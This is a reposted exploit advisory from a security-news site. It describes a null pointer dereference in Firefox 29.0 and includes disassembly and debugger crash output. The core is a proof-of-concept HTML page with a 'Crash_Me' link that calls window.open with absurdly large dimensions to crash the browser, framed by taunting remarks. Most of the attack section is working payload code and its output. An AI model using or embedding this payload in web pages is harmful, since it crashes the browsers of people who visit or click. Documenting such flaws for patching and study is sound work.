首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mozilla Firefox 29.0 - Null Pointer Dereference Vulnerability
来源:Mr.XHat {AT} GMail.com 作者:Mr.XHat 发布时间:2014-05-19  
<html>
<title>Mozilla Firefox Null Pointer Dereference Vulnerability</title>
<pre>
Fun side of life!
<br>
Details:
    Title: Mozilla Firefox Null Pointer Dereference Vulnerability
    Version: Prior to 29.0
    Date: 4/30/2014
    Discovered By: Mr.XHat
    E-Mail: Mr.XHat {AT} GMail.com
    Tested On: Windows 7 x64 EN
###################################
Disassembly:
    01694240 8bc2            mov     eax,edx
    01694242 d9e0            fchs
    01694244 8b550c          mov     edx,dword ptr [ebp+0Ch]
    01694247 d95c2418        fstp    dword ptr [esp+18h]
    0169424b 8b1a            mov     ebx,dword ptr [edx]  ds:0023:00000000=????????
    0169424d d9442418        fld     dword ptr [esp+18h]
    01694251 8d4c2420        lea     ecx,[esp+20h]
    01694255 d9c0            fld     st(0)
    01694257 51              push    ecx
============================================
Output:
    (e0.544): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=07e1fd00 ebx=0994bf90 ecx=000001f8 edx=00000000 esi=000000a8 edi=00000000
    eip=0169424b esp=0012c8f0 ebp=0012c940 iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Mozilla Firefox\xul.dll - 
    xul!NS_NewLocalFile+0x2a49c:
    0169424b 8b1a            mov     ebx,dword ptr [edx]  ds:0023:00000000=????????
#######################################################################################
</pre>
<a href="javascript:_Launch_Website_In_Floating_Window_()"
onclick="window.open('about:blank','1','toolbar=yes,location=yes,directories=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=9999999999,height=9999999999');"
>Crash_Me</a>
<br><br>
I kill you again!
</html>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Wireshark 1.10.7 - DoS PoC
·WinAMP 5.666 Memory Corruption
·ElasticSearch Remote Code Exec
·Realplayer 16.0.3.51 Memory Co
·K-Lite CODEC 10.45 Memory Corr
·Allplayer 5.9 Memory Corruptio
·Linux Kernel 3.15-rc4 PTY Race
·Intel Ideo Video 4.5 Memory Co
·TFTPD32 4.5 / TFTPD64 4.5 - Do
·AoA MP4 Converter 4.1.2 - Acti
·Easy File Sharing Web Server 6
·AoA Audio Extractor Basic 2.3.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved